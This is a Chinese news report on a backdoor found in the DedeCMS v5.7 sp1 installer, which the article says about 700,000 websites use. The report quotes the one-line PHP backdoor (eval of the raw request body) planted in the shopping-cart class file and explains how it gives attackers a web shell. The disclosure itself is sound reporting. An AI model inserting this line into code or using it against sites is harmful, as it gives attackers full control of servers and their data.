织梦CMS系统被曝植入后门 70万网站资料或泄露

fmms 9年前
     <div id="news_body">     <p style="text-align:center;"><img src="https://simg.open-open.com/show/3288ce9f46c51a9279502a3b7c8ea14e.jpg" alt="织梦CMS系统被曝植入后门 70万网站资料或泄露" border="0" height="349" width="550" /></p>     <p style="text-align:center;">        织梦 CMS 中被植入的后门代码</p>     <p>        3月 22 日消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)v5.7 sp1 版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。</p>     <p>        据织梦 CMS 官方数据显示,目前约有 70 万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。</p>     <p>        安全界人士分析发现,此次织梦 CMS 曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval (file_get_contents ('php://input'));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的 WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。</p>    </div>